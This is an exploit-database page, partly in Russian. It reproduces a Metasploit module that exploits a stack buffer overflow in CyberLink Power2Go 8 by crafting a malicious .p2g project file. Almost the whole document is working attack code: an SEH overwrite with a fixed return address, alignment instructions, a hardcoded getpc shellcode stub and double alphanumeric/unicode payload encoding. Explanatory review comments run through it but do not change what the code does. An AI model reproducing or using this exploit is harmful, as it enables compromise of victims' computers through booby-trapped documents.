CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit

Свойства

Дата публикации:
17.04.2012
Цель:
CyberLink Power2Go
Тип воздействия:
Компрометация системы

Код

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

##
# Metasploit file-format exploit module for CyberLink Power2Go 8. Despite the
# Msf::Exploit::Remote base class it never contacts a host: `exploit` builds a
# crafted .p2g project document and hands it to file_create (FILEFORMAT mixin),
# so the output is a file on disk named by the FILENAME option.
##
class Metasploit3 < Msf::Exploit::Remote
    Rank = GreatRanking

    # Supplies file_create and the FILENAME handling used in `exploit`.
    include Msf::Exploit::FILEFORMAT

    # Registers module metadata (name, authors, references, payload limits,
    # the single target) and the FILENAME option.
    #
    # info - Hash of module info merged via update_info (default: {}).
    def initialize(info = {})
        super(update_info(info,
            'Name'            => 'CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit',
            'Description'     => %q{
                    This module exploits a stack buffer overflow in CyberLink Power2Go version 8.x
                The vulnerability is triggered when opening a malformed p2g file containing an overly
                long string in the 'name' attribute of the file element. This results in overwriting a
                structured exception handler record.
            },
            'License'         => MSF_LICENSE,
            'Author'          =>
                [
                    'modpr0be <modpr0be[at]spentera.com>',    # initial discovery
                    'mr_me <steventhomasseeley[at]gmail.com>' # msf module
                ],
            'References'      =>
                [
                    ['BID', '50997'],
                    ['OSVDB', '70600'],
                    # NOTE(review): the stray ';' after each URL string below
                    # looks like a page-extraction artifact (HTML-decoded quote)
                    # rather than original module text — confirm against upstream.
                    ['URL', 'http://www.exploit-db.com/exploits/18220/';],
                    ['URL', 'http://www.kb.cert.org/vuls/id/158003';]
                ],
            'DefaultOptions'  =>
                {
                    'EXITFUNC' => 'process',
                    'InitialAutoRunScript' => 'migrate -f',
                },
            # Constraints for the framework's own payload generation. The
            # alpha/unicode passes in get_payload are applied on top of the
            # result of this step (see `get_payload(payload.encoded)` below).
            'Payload'         =>
                {
                    'Space'    => 1024,
                    'BadChars' => "\x00"
                },
            'Platform'        => 'win',
            # 'Ret' is only two bytes. The 0x004b0028 note and the
            # "(after byte alignment)" comments in `exploit` suggest the
            # application widens the attribute to UTF-16, so "\x28\x4b" would
            # become that 4-byte address — inferred, not shown in this file.
            'Targets'         =>
                [
                    # Power2Go8.exe (0x004b0028) - pop esi/pop ebp/pop ebx/add esp,10/retn
                    [ 'CyberLink Power2Go 8 (XP/Vista/win7) Universal', { 'Ret' => "\x28\x4b" } ]
                ],
            'DisclosureDate'  => 'Sep 12 2011',
            'DefaultTarget'   => 0))

        register_options(
            [
                OptString.new('FILENAME', [ true, 'The output filename.', 'msf.p2g'])
            ], self.class)
    end

    # Applies two encoder passes, in array order, to an already badchar-free
    # payload: x86/alpha_mixed (BufferRegister EDX) first, after which a fixed
    # getpc stub is prepended; then x86/unicode_mixed (BufferRegister EAX) over
    # stub + alphanumeric payload together, because each iteration assigns its
    # output back to `hunter` and the next iteration reads that.
    #
    # hunter - String, the payload bytes to wrap. The parameter variable is
    #          reassigned inside the loop; the caller's String object is not
    #          modified in place (enc.encode presumably returns a new String —
    #          confirm).
    #
    # Returns the doubly-encoded String.
    #
    # NOTE(review): framework.encoders.create presumably returns nil when the
    # named encoder is not loaded, which would fail here on `enc.datastore`
    # with a NoMethodError rather than a clear message — confirm.
    def get_payload(hunter)
        
        [ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|
            enc = framework.encoders.create(name)
            if name =~ /unicode/
                enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
            else
                enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })
            end
            # NOTE: we already eliminated badchars
            hunter = enc.encode(hunter, nil, nil, platform)
            if name =~/alpha/
                #insert getpc_stub & align EDX, unicode encoder friendly.
                #Hardcoded stub is not an issue here because it gets encoded anyway
                getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
                hunter = getpc_stub + hunter
            end
        }

        return hunter
    end

    # Builds the malformed p2g document and writes it to FILENAME.
    #
    # The oversized value of the File element's name attribute is, by exact
    # sum of the literals below: 778 bytes of random alpha filler, a 2-byte
    # nSEH, the 2-byte target 'Ret', then 714 bytes of 1- and 2-byte
    # instruction fragments — 1496 bytes in total — followed by the output of
    # get_payload. A name attribute of that size carrying non-filename data is
    # the file-level indicator of this document.
    #
    # `<<-EOS` only allows the terminator to be indented; the body keeps its
    # leading whitespace, so the written XML is indented by eight spaces.
    # Whether the parser cares about that cannot be determined from this file.
    def exploit

        title = rand_text_alpha(10)  # randomised value for the 'magic' attribute
        buffer =  ""
        buffer << rand_text_alpha(778)
        buffer << "\x58\x28"        # nseh
        buffer << target['Ret']     # seh
        buffer << "\x5f\x73" * 15   # pop edi/add [ebx],dh (after byte alignment)
        buffer << "\x58\x73"        # pop eax/add [ebx],dh (after byte alignment)
        buffer << "\x40\x73" * 3    # inc eax/add [ebx],dh (after byte alignment)
        buffer << "\x40"            # inc eax
        buffer << "\x73\x42" * 337  # add [ebx],dh/pop edx (after byte alignment)
        buffer << "\x73"            # add [ebx],dh (after byte alignment)
        # payload.encoded has already honoured 'Space'/'BadChars'; get_payload
        # re-encodes it (alpha, then unicode) before it is embedded.
        buffer << get_payload(payload.encoded)

        p2g_data = <<-EOS
        <Project magic="#{title}" version="101">
        <Information />
            <Compilation>
                <DataDisc>
                    <File name="#{buffer}" />
                </DataDisc>
            </Compilation>
        </Project>
        EOS

        print_status("Creating '#{datastore['FILENAME']}' file ...")
        file_create(p2g_data)
    end
end
